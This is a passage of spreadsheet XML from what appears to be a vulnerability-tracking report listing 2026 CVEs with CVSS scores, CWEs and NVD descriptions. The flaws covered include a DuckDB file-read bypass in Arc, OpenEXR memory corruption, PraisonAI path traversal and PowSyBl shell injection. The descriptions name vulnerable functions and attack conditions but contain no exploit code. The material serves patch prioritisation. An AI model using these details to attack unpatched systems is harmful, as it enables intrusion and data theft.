          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex denylist. The broader DuckDB I/O function family — `read_csv_auto`, `read_csv`, `read_json`, `read_json_auto`, `read_text`, `read_blob`, `glob`, `parquet_metadata`, `parquet_schema`, `read_xlsx`, etc. — was not blocked. RBAC table-reference extraction inspected only `FROM`/`JOIN` clauses, so scalar table functions in the `SELECT` list slipped past both layers. This is fixed in 2026.06.1 via a structural sandbox at the DuckDB layer. After lockdown, DuckDB refuses to open any file outside the allowlist and refuses further `INSTALL`/`LOAD`. Already-loaded extensions remain callable. Some workarounds are available. Restrict API access to known-trusted networks via firewall rules or, as a temporary mitigation, add `read_csv*`/`read_json*`/`glob` etc. to `dangerousSQLPattern` in `internal/api/query.go`.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47735</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49249</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, BorutaIdentityWeb.UserSettingsController.update/2 atomizes every key of the user-supplied request body via String.to_atom/1 before any validation. Because String.to_atom interns atoms permanently in the BEAM atom table (default cap 1,048,576 atoms; ERL_MAX_ATOMS), any authenticated end user can send PUT /users/settings with a user[&lt;fresh-key&gt;]=... body containing fresh keys per request and exhaust the global VM atom table. Once the table is full, the BEAM aborts with no more index entries in atom_tab and the entire OIDC server (auth, admin, gateway apps in the umbrella) crashes. The route is protected only by require_authenticated_user and a per-IP rate limit of 10 requests/second; a logged-in end user can hit it. The keys are atomized unconditionally before the downstream Accounts.update_user/6 call, so even failing updates contribute to exhaustion. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49249</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49315</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the input device module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49315</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50165</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. An Improper Access Control issue in versions prior to 2.0-M5-2605 allows an organization owner to read system-level configuration secrets through organization/event scoped "single configuration" endpoints. The affected endpoints require organization or event ownership, but they accept an arbitrary configuration key and then return the first matching value from a lookup that includes system-level configuration. As a result, an organization owner can retrieve secrets intended to be administrator-only, including the system API key when it is configured. Version 2.0-M5-2605 fixes the issue.</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50165</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53532</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a crafted HTJ2K-compressed EXR file causes an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53532</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53728</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-601</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. Prior to version 5.1.6, the external identity provider callback at GET /auth/external accepts attacker-controlled redirect URIs that only need to start with a registered client redirect URI, rather than matching exactly. After a successful external IdP login, the server appends Medplum login and code values to that attacker-supplied URL and issues a redirect. Because the external login request state is serialized as raw JSON and later trusted by the callback, an attacker who can tamper with state.redirectUri can cause Medplum to redirect authorization artifacts to an attacker-controlled endpoint. When the registered redirect URI is a bare origin or another prefix that can be extended into a different hostname, this becomes a cross-origin authorization code leak. This issue has been patched in version 5.1.6.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53728</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55066</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket}/tasks accepts a body supplied task_id but TaskBucket.CanUpdate in pkg/models/kanban_task_bucket.go authorizes only the project, view, and bucket from the URL. updateTaskBucket then calls Task.ReadOne without a separate task permission check, returns the victim task contents, and can update the task done state when the attacker chooses a done bucket. Because task identifiers are global sequential values, an authenticated user can enumerate cross-tenant tasks and modify their completion metadata through both the v1 and v2 routes that share this model. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55066</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55520</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>Protego is a pure-Python robots.txt parser with support for modern conventions. Prior to 0.6.2, protego._urlpattern._URLPattern._prepare_pattern_for_regex translates every asterisk in an Allow or Disallow directive into a lazy regular-expression wildcard, so a directive containing many asterisks creates exponential backtracking. After protego.Protego.parse processes a crafted robots.txt file, protego.Protego.can_fetch can spend an attacker-controlled period matching a near-miss URL and deny service to the crawler. The vulnerable path is src/protego/_urlpattern.py in the _URLPattern match logic. This issue is fixed in version 0.6.2.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55520</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55527</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the FileMemory constructor joins unsanitized user_id into self.user_path. A caller supplying ../ or path separators can escape the memory directory and write JSON data to arbitrary process-writable locations. The fix sanitizes user_id before constructing self.user_path. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55527</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55537</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-705, CWE-918</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, JobSubmitRequest.validate_webhook_url() accepts webhook_url when resolution raises socket.gaierror because the exception path uses except socket.gaierror: pass. JobExecutor._send_webhook() later performs a fresh lookup, allowing DNS changes to direct the request to an internal service. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55537</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55540</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, is_path_within_directory() uses os.path.abspath() rather than os.path.realpath() for the workspace boundary. A symlink inside workspace can point outside and still pass the check, allowing read_file and other code tools to access files outside the configured workspace. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55540</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55609</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>sublinear-time-solver is a Rust and WebAssembly library for solving asymmetric diagonally dominant systems in sublinear time. Prior to consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0, the export_state and import_state tools in src/consciousness-explorer/mcp/server.js pass the attacker-controlled filepath parameter to filesystem operations in src/consciousness-explorer/index.js without restricting the destination or rejecting traversal. The saveVectorToFile and loadVectorFromFile tools in src/mcp/server.ts contain the same sink class through the file_path parameter. An attacker able to invoke the MCP tools can read, write, or overwrite any file accessible to the server process, causing confidentiality and integrity loss and possible service disruption. This issue is fixed in consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55609</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55673</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to 7.2.2, UnixLocalCommandExecutor and WindowsLocalCommandExecutor concatenate command arguments and environment variables into strings interpreted through bash -c or cmd /c without sufficient escaping. Attacker-controlled values reaching UnixLocalCommandExecutor.execute, WindowsLocalCommandExecutor.execute, LocalComputationManager.execute, ParallelLoadFlowActionSimulator.run, ActionSimulatorTool.run, AmplModelRunner.run, or AmplModelRunner.runAsync can break out of the intended command and execute arbitrary shell commands as the JVM user. The affected itools paths include action-simulator with task-count, security-analysis with external, and dynamic-security-analysis. Downstream CLI tools, libraries, REST front ends, and multi-tenant grid-analysis services that forward less-trusted contingency identifiers or computation parameters into these APIs can expose the injection remotely. This issue is fixed in version 7.2.2.</t>
        </is>
      </c>
      <c r="S592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55673</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59184</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-787</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 allow a crafted EXR with a nonzero dataWindow.min to make TypedFlatImageChannel::row() return an invalid heap pointer, causing out-of-bounds or use-after-free writes. This occurs when an application writes rows through FlatHalfChannel::row(). Affected consumers are tools, converters, render pipeline components, or image-processing services that accept untrusted EXR files and use FlatHalfChannel::row() on loaded images. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59184</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59186</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, a crafted tiled EXR can trigger a heap out-of-bounds write on 32-bit/ILP32 builds when read through the public TiledRgbaInputFile RGBA API. The file uses a small 40x40 dataWindow but a 65537x65537 tile size. On ILP32, the Array2D&lt;Rgba&gt; tile-conversion buffer size calculation overflows, allocates a much smaller heap buffer, and tile decode writes past that allocation. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59186</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59187</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
